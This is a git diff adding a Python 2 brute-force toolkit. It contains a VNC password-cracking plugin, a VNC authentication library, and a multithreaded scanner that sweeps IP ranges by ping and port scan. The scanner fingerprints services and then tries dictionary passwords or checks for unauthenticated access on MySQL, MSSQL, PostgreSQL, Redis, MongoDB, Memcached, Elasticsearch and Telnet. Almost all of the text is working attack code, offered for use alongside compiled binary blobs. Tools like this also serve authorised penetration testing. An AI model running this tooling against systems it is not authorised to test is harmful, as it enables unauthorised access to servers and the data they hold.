z@$mO9zV-)@h^PmuDDo&#)B{uS9`!uoOO%voQl?&+CKc*cNX<2>)T=JEm#DY2;A_;Y z316n9PLl@p8l-fM#>*5{=#_$jDt(K4n-nbx)1s&*%nG~lMW+tOTovRnPHbx8zwp`Z zu-}eFSsokrI5zvPu~F6H6VMerp>oy$G zOtD`Z$7Pz8DJp@hP*kSlDmg`Ck7iinw+bzFyhO7l8kgAleUI`j6%!rTXohgX+Kf-v z`9bhxT%lQAOwSOKI^8)j*C5`S8}&|%E{oAW`Tb*rw8?J5Jy?h3L7CP$fDX}wT>{tm zFP&x4iCX-UgS)4WMJr;rFj}JZ2M^g~p>D3yiT!AmPRpWmY--P}QQ0+Vzd`wzhzRm) z6n!(ju-VcYS!ds8<`^Y~@p;?&5Ikq#oA+xRy~?MEQnw(ZhM7`V38`PXr%+hDOd3T*pO z2m9Kzv%uQJG>^8nZWfqL2RPM zt%W?p>$YMp)DHXYN+8zd2q#gl52o5WE1N^@9G9haft%WXm_}L({&`^a2e%MfB5imV zr(-h|S+4Cgal!^!rcETJo}}Tvgd_+Lrg5%)X%h}>t`iM&(lYm7ggWEsb@*1tI&miF zvov?&-xPr}!9>eq5i4}lMb%JM zbwRCyuBZ)l8Qc}@UBb8SHPjob1zN$X;jMaQ74q{rCHxQpg{w1`U$9@QGg{39^cSo zgZ{?40F&>E^;s7mT&KM~a}kYKk;eOl7>X3I=)ptozKGC${Hk4h4iteJEJDb<&sA&r z<*kO#s3`p>wO|m19rkw2fMV#HPzy)6>}@XVUnEoG-}9F zoJGxEWak-*xz%^=CTN%k;r<+|`jY@i);8(k&d!eIG(NrltPLQ_UHc5ZZ7YdmFfTGV zHK8y;KD7TTBzx%}YiYJXMsz#FF>uu0oQqFi(~eT3Z^TZJ`hF5*Rs&Qq5g2tlt2p6v zMah-CU7(L}oJThT5Je1;Twad=hCWxn&yeAlSb?JeyiAVzfju&ze~l&FC;rr2Be|ZB~XIC{eB?RvfuYPK0c3<0@C@vCLphbQ>KK^`S9Om1#Tvb z-~rvai67Gis&%1Fbq>&8->R?u4Y&zFu>b%7 literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/vnc.py b/Bruteforce/plugins/vnc.py new file mode 100644 index 0000000..72fefee --- /dev/null +++ b/Bruteforce/plugins/vnc.py @@ -0,0 +1,74 @@ +from printers import printPink,printGreen +import time +import threading +from multiprocessing.dummy import Pool +from vnclib import * + + +class vnc_burp(object): + + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/vnc.conf") + + def vnc_connect(self,ip,port,password): + crack =0 + try: + v = VNC() + v.connect(ip, port, 10) + code,mesg=v.login(password) + if mesg=='OK': + crack=1 + except Exception,e: + crack=2 + pass + return crack + + def vnc_l(self,ip,port): + try: + for data in self.lines: + flag=self.vnc_connect(ip=ip,port=port,password=data) + if flag==2: + self.lock.acquire() + print "%s vnc at %s not allow connect now because of too many security failure" %(ip,port) + self.lock.release() + break + + if flag==1: + self.lock.acquire() + printGreen("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data)) + self.result.append("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data)) + self.lock.release() + break + else: + self.lock.acquire() + print "login %s vnc service with %s fail " %(ip,data) + self.lock.release() + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['vnc']): + printPink("crack vnc now...") + print "[*] start crack vnc %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['vnc']: + pool.apply_async(func=self.vnc_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + + print "[*] stop vnc serice %s" % time.ctime() + print "[*] crack vnc done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + + + diff --git a/Bruteforce/plugins/vnc.pyc b/Bruteforce/plugins/vnc.pyc new file mode 100644 index 0000000000000000000000000000000000000000..3fbd2adc64685ea3e010d47e8514a2b14bdfe19a GIT binary patch literal 2958 zcmb_e-*4PR5T3Q~E|*J=whB#YDV2-V>QqW1A$X|}s%WbssM6v<1A)kL?7hogd~4Uc z*W{$+sr)tk6+H5X@QQc<@e1FJFQkP^NYInLH~VXL_M2~J9RAwx{qX&7k29M8Lj2#x z>vqxPcoY>x6GhvKCIM{+qzdGuz+LCANUOdNPZDbRU7Lc8N2U$C%yZ%)^=l{cu5P*qp~cT9uM8{ zU9?Yamh4XJ>aVNt)W>+;O*ESL1~47x;}WfN#RxkVcKr;_etvn@@PwEbj2Jn{vMm*JstG9j?RNH5LQ`- zUpig8^#fD5(yn{J>DGtZj`pUh9l0#ER@cdTRZK_5I*1SO7PC$*@~ z;LZ3vb|0G|cvTR9!f}gcpOP21AGhhKO=IAK2VMYzAt@dT=qO~sz76QOL&pnrw7@Re z52$`fd5g7JqAh!oS{}nas`p79cfqo@%qjZns0EZ6oehJA4710x2OoZB7z4wy_!b(7 z9&g<7%sx25>TC{QiTety_YN~%c~jZ}-zi>3Bf3l_o~X*&3m#SK+(B9Af__$~a1fvM zR90nWu0@z=Hz-;;v9H}{ewYxg+ibYbm0c}$5>VdH0CLBK;z9}K&$sZ;Q+u~ zOXeQIXS}f^8-ILpBOuG+XJG=48HTh90w`9{p)uUwefi|6_9y)pHRg-51G@fc3f69I z*%i>IEA&}X3T#vs#F6l1wrs?&qm9pV!+;87+7%qL%7bX`0gN0( zyE;p!PDkZ1LOey2)XpNOvuSPoEE=Y!nATc&=-&Ce!oAc*2Rhx?Hag+c)vNFF@0#oP zB!9hNK=dyg-o^n1Q<<%0yAkY9O{Sv*GW%_b;fo(6$1Og7bJY-pKazD^YL-S3*_-|3LYRU|xMmAx1eTfrX$x;=Q3b zSk1DedvFGqYH}44)#1*Gg1bAPOWFc;!Rw|FAoF9n4`}NM>Ut7NEG>xymOpP=-jl9ahfMkgtUbIO0i)mC*omA^Yacx~ zf6X=CpV~}>v>rLhfwv5{P!kHLyUXf?sZ3Om)ZLhCKGm6*R^K#U=zp(BE2s0wn~A;! zN=r6IJbG>Y{A5(d!C5Gg8x-2ce6HBSo0^QxQp|S54Rz2J;m z2`(!McriIiY&y|NB6m!ZNtsUzbmP~sy-6vIVa(r6rzVQ@pT9w3zJ3?4e0y}l#m-`X z@xnk#JrB#bBff0J)lJf38pRB@=e$0_cay2=GSkih@wI$9nammj@EY*EFuUT(a(9f+ b0y*$iSud!4*x>XLXH>_AuOf9VGu+{yiKbs( literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/vnclib.py b/Bruteforce/plugins/vnclib.py new file mode 100644 index 0000000..eaf6470 --- /dev/null +++ b/Bruteforce/plugins/vnclib.py @@ -0,0 +1,97 @@ +__author__ = 'wilson' +from Crypto.Cipher import DES +from sys import version_info +import time + +class VNC_Error(Exception): + pass +class VNC: + def connect(self, host, port, timeout): + self.fp = socket.create_connection((host, port), timeout=timeout) + resp = self.fp.recv(99) # banner + + self.version = resp[:11].decode('ascii') + + if len(resp) > 12: + raise VNC_Error('%s %s' % (self.version, resp[12:].decode('ascii', 'ignore'))) + + return self.version + + def login(self, password): + major, minor = self.version[6], self.version[10] + + if (major, minor) in [('3', '8'), ('4', '1')]: + proto = b'RFB 003.008\n' + + elif (major, minor) == ('3', '7'): + proto = b'RFB 003.007\n' + + else: + proto = b'RFB 003.003\n' + + self.fp.sendall(proto) + + time.sleep(0.5) + + resp = self.fp.recv(99) + + + if minor in ('7', '8'): + code = ord(resp[0:1]) + if code == 0: + raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore')) + + self.fp.sendall(b'\x02') # always use classic VNC authentication + resp = self.fp.recv(99) + + else: # minor == '3': + code = ord(resp[3:4]) + if code != 2: + raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore')) + + resp = resp[-16:] + + if len(resp) != 16: + raise VNC_Error('Unexpected challenge size (No authentication required? Unsupported authentication type?)') + + + pw = password.ljust(8, '\x00')[:8] # make sure it is 8 chars long, zero padded + + key = self.gen_key(pw) + + + des = DES.new(key, DES.MODE_ECB) + enc = des.encrypt(resp) + + + self.fp.sendall(enc) + + resp = self.fp.recv(99) + + self.fp.close() + code = ord(resp[3:4]) + mesg = resp[8:].decode('ascii', 'ignore') + + if code == 1: + return code, mesg or 'Authentication failure' + + elif code == 0: + return code, mesg or 'OK' + + else: + raise VNC_Error('Unknown response: %s (code: %s)' % (repr(resp), code)) + + def gen_key(self, key): + newkey = [] + for ki in range(len(key)): + bsrc = ord(key[ki]) + btgt = 0 + for i in range(8): + if bsrc & (1 << i): + btgt = btgt | (1 << 7-i) + newkey.append(btgt) + + if version_info[0] == 2: + return ''.join(chr(c) for c in newkey) + else: + return bytes(newkey) diff --git a/Bruteforce/plugins/vnclib.pyc b/Bruteforce/plugins/vnclib.pyc new file mode 100644 index 0000000000000000000000000000000000000000..6b3415140b036f7fc6c2545488a2d3d078232983 GIT binary patch literal 3325 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: + data4=data3.replace('0X',str(hex(lusername)).replace('0x','')) + else: + data4=data3.replace('X',str(hex(lusername)).replace('0x','')) + if lpassword>=16: + data5=data4.replace('0Y',str(hex(lpassword)).replace('0x','')) + else: + data5=data4.replace('Y',str(hex(lpassword)).replace('0x','')) + hladd = hex(ladd).replace('0x', '') + data6=data5.replace('ZZ',str(hladd)) + data7=binascii.a2b_hex(data6) + sock.send(data7) + packet=sock.recv(1024) + if 'master' in packet: + return "username:%s,password:%s" % (user,pass_) + except: + return 3 + def mongodb(self,user,pass_): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((self.ip,int(self.port))) + data = binascii.a2b_hex("3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000") + s.send(data) + result = s.recv(1024) + if "ismaster" in result: + getlog_data = binascii.a2b_hex("480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000") + s.send(getlog_data) + result = s.recv(1024) + if "totalLinesWritten" in result: + return "unauthorized" + else:return 3 + except Exception,e: + return 3 + def memcached(self,user,pass_): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((self.ip,int(self.port))) + s.send("stats\r\n") + result = s.recv(1024) + if "version" in result: + return "unauthorized" + def elasticsearch(self,user,pass_): + url = "http://"+self.ip+":"+str(self.port)+"/_cat" + data = urllib2.urlopen(url).read() + if '/_cat/master' in data: + return "unauthorized" + else: + return 3 + def telnet(self,user,pass_): + try: + tn = telnetlib.Telnet(self.ip,self.port,self.timeout) + #tn.set_debuglevel(3) + time.sleep(0.5) + os = tn.read_some() + except Exception ,e: + return 3 + user_match="(?i)(login|user|username)" + pass_match='(?i)(password|pass)' + login_match='#|\$|>' + if re.search(user_match,os): + try: + tn.write(str(user)+'\r\n') + tn.read_until(pass_match,timeout=2) + tn.write(str(pass_)+'\r\n') + login_info=tn.read_until(login_match,timeout=3) + tn.close() + if re.search(login_match,login_info): + return "username:%s,password:%s" % (user,pass_) + except Exception,e: + pass + else: + try: + info=tn.read_until(user_match,timeout=2) + except Exception,e: + return 3 + if re.search(user_match,info): + try: + tn.write(str(user)+'\r\n') + tn.read_until(pass_match,timeout=2) + tn.write(str(pass_)+'\r\n') + login_info=tn.read_until(login_match,timeout=3) + tn.close() + if re.search(login_match,login_info): + return "username:%s,password:%s" % (user,pass_) + except Exception,e: + return 3 + elif re.search(pass_match,info): + tn.read_until(pass_match,timeout=2) + tn.write(str(pass_)+'\r\n') + login_info=tn.read_until(login_match,timeout=3) + tn.close() + if re.search(login_match,login_info): + return "password:%s" % (pass_) + def get_hash(self,password, scramble): + hash_stage1 = hashlib.sha1(password).digest() + hash_stage2 = hashlib.sha1(hash_stage1).digest() + to = hashlib.sha1(scramble+hash_stage2).digest() + reply = [ord(h1) ^ ord(h3) for (h1, h3) in zip(hash_stage1, to)] + hash = struct.pack('20B', *reply) + return hash + def get_scramble(self,packet): + scramble,plugin = '','' + try: + tmp = packet[15:] + m = re.findall("\x00?([\x01-\x7F]{7,})\x00", tmp) + if len(m)>3:del m[0] + scramble = m[0] + m[1] + except: + return '','' + try: + plugin = m[2] + except: + pass + return plugin,scramble + def get_auth_data(self,user,password,scramble,plugin): + user_hex = binascii.b2a_hex(user) + pass_hex = binascii.b2a_hex(self.get_hash(password,scramble)) + data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0014" + pass_hex + if plugin:data+=binascii.b2a_hex(plugin)+ "0055035f6f73076f737831302e380c5f636c69656e745f6e616d65086c69626d7973716c045f7069640539323330360f5f636c69656e745f76657273696f6e06352e362e3231095f706c6174666f726d067838365f3634" + len_hex = hex(len(data)/2).replace("0x","") + auth_data = len_hex + "000001" +data + return binascii.a2b_hex(auth_data) + def make_response(self,buf,username,password,salt): + pu=hashlib.md5(password+username).hexdigest() + buf=hashlib.md5(pu+salt).hexdigest() + return 'md5'+buf +class SendPingThr(threading.Thread): + def __init__(self, ipPool, icmpPacket, icmpSocket, timeout=3): + threading.Thread.__init__(self) + self.Sock = icmpSocket + self.ipPool = ipPool + self.packet = icmpPacket + self.timeout = timeout + self.Sock.settimeout(timeout + 1) + def run(self): + time.sleep(0.01) + for ip in self.ipPool: + try: + self.Sock.sendto(self.packet, (ip, 0)) + except socket.timeout: + break + time.sleep(self.timeout) + +class Nscan: + def __init__(self, timeout=3): + self.timeout = timeout + self.__data = struct.pack('d', time.time()) + self.__id = os.getpid() + if self.__id >= 65535:self.__id = 65534 + @property + def __icmpSocket(self): + Sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp")) + return Sock + + def __inCksum(self, packet): + if len(packet) & 1: + packet = packet + '\0' + words = array.array('h', packet) + sum = 0 + for word in words: + sum += (word & 0xffff) + sum = (sum >> 16) + (sum & 0xffff) + sum = sum + (sum >> 16) + return (~sum) & 0xffff + + @property + def __icmpPacket(self): + header = struct.pack('bbHHh', 8, 0, 0, self.__id, 0) + packet = header + self.__data + chkSum = self.__inCksum(packet) + header = struct.pack('bbHHh', 8, 0, chkSum, self.__id, 0) + return header + self.__data + + def mPing(self, ipPool): + Sock = self.__icmpSocket + Sock.settimeout(self.timeout) + packet = self.__icmpPacket + recvFroms = set() + sendThr = SendPingThr(ipPool, packet, Sock, self.timeout) + sendThr.start() + while True: + try: + ac_ip = Sock.recvfrom(1024)[1][0] + if ac_ip not in recvFroms: + log("active",ac_ip,0,None) + recvFroms.add(ac_ip) + except Exception: + pass + finally: + if not sendThr.isAlive(): + break + return recvFroms & ipPool +def get_ac_ip(ip_list): + try: + s = Nscan() + ipPool = set(ip_list) + return s.mPing(ipPool) + except Exception,e: + print 'The current user permissions unable to send icmp packets' + return ip_list +class ThreadNum(threading.Thread): + def __init__(self,queue): + threading.Thread.__init__(self) + self.queue = queue + def run(self): + while True: + try: + if queue.empty():break + queue_task = self.queue.get() + except: + break + try: + task_type,task_host,task_port = queue_task.split(":") + if task_type == 'portscan': + data = scan_port(task_host,task_port) + if data: + server_name = server_discern(task_host,task_port,data) + if server_name: + log('discern',task_host,task_port,server_name) + queue.put(":".join([server_name,task_host,task_port])) + else: + result = pass_crack(task_type,task_host,task_port) + if result and result !=3:log(task_type,task_host,task_port,result) + except Exception,e: + continue +def scan_port(host,port): + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((str(host),int(port))) + log('portscan',host,port) + except Exception,e: + return False + try: + data = sock.recv(512) + if len(data) > 2: + return data + else: + sock.send('a\n\n') + data = sock.recv(512) + sock.close() + if len(data) > 2: + return data + else: + return 'NULL' + except Exception,e: + sock.close() + return 'NULL' +def log(scan_type,host,port,info=''): + mutex.acquire() + time_str = time.strftime('%X', time.localtime( time.time())) + if scan_type == 'portscan': + print "[%s] %s:%d open"%(time_str,host,int(port)) + elif scan_type == 'discern': + print "[%s] %s:%d is %s"%(time_str,host,int(port),info) + elif scan_type == 'active': + print "[%s] %s active" % (time_str, host) + elif info: + log = "[*%s] %s:%d %s %s"%(time_str,host,int(port),scan_type,info) + print log + log_file = open('result.log','a') + log_file.write(log+"\r\n") + log_file.close() + mutex.release() +def server_discern(host,port,data): + for mark_info in REGEX: + try: + name,default_port,reg = mark_info + if reg and data <> 'NULL': + matchObj = re.search(reg,data,re.I|re.M) + if matchObj: + return name + elif int(default_port) == int(port): + return name + except Exception,e: + #print e + continue +def pass_crack(server_type,host,port): + m = Crack(host,port,server_type,TIMEOUT) + return m.run() +def get_password_dic(path): + pass_list = [] + try: + file_ = open(path,'r') + for password in file_: + pass_list.append(password.strip()) + file_.close() + return pass_list + except: + return 'read dic error' +def get_ip_list(ip): + ip_list = [] + iptonum = lambda x:sum([256**j*int(i) for j,i in enumerate(x.split('.')[::-1])]) + numtoip = lambda x: '.'.join([str(x/(256**i)%256) for i in range(3,-1,-1)]) + if '-' in ip: + ip_range = ip.split('-') + ip_start = long(iptonum(ip_range[0])) + ip_end = long(iptonum(ip_range[1])) + ip_count = ip_end - ip_start + if ip_count >= 0 and ip_count <= 65536: + for ip_num in range(ip_start,ip_end+1): + ip_list.append(numtoip(ip_num)) + else: + print '-h wrong format' + elif '.ini' in ip: + ip_config = open(ip,'r') + for ip in ip_config: + ip_list.extend(get_ip_list(ip.strip())) + ip_config.close() + else: + ip_split=ip.split('.') + net = len(ip_split) + if net == 2: + for b in range(1,255): + for c in range(1,255): + ip = "%s.%s.%d.%d"%(ip_split[0],ip_split[1],b,c) + ip_list.append(ip) + elif net == 3: + for c in range(1,255): + ip = "%s.%s.%s.%d"%(ip_split[0],ip_split[1],ip_split[2],c) + ip_list.append(ip) + elif net ==4: + ip_list.append(ip) + else: + print "-h wrong format" + return ip_list +def t_join(m_count): + tmp_count = 0 + i = 0 + if I < m_count: + count = len(ip_list) + 1 + else: + count = m_count + while True: + time.sleep(4) + ac_count = threading.activeCount() + #print ac_count,count + if ac_count < count and ac_count == tmp_count: + i+=1 + else: + i=0 + tmp_count = ac_count + #print ac_count,queue.qsize() + if (queue.empty() and threading.activeCount() <= 1) or i > 5: + break +def put_queue(ip_list,port_list): + for ip in ip_list: + for port in port_list: + queue.put(":".join(['portscan',ip,port])) +if __name__=="__main__": + msg = ''' +Usage: python Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10] [-d pass.txt] [-n] + ''' + if len(sys.argv) < 2: + print msg + try: + options,args = getopt.getopt(sys.argv[1:],"h:p:m:t:d:n") + ip = '' + port = '21,23,1433,3306,5432,6379,9200,11211,27017' + m_count = 100 + ping = True + for opt,arg in options: + if opt == '-h': + ip = arg + elif opt == '-p': + port = arg + elif opt == '-m': + m_count = int(arg) + elif opt == '-t': + TIMEOUT = int(arg) + elif opt == '-n': + ping = False + elif opt == '-d': + PASSWORD_DIC = get_password_dic(arg) + socket.setdefaulttimeout(TIMEOUT) + if ip: + ip_list = get_ip_list(ip) + if ping:ip_list = get_ac_ip(ip_list) + port_list = port.split(',') + for ip_str in ip_list: + for port_int in port_list: + I+=1 + queue.put(':'.join(['portscan',ip_str,port_int])) + for i in range(m_count): + t = ThreadNum(queue) + t.setDaemon(True) + t.start() + t_join(m_count) + except Exception,e: + print msg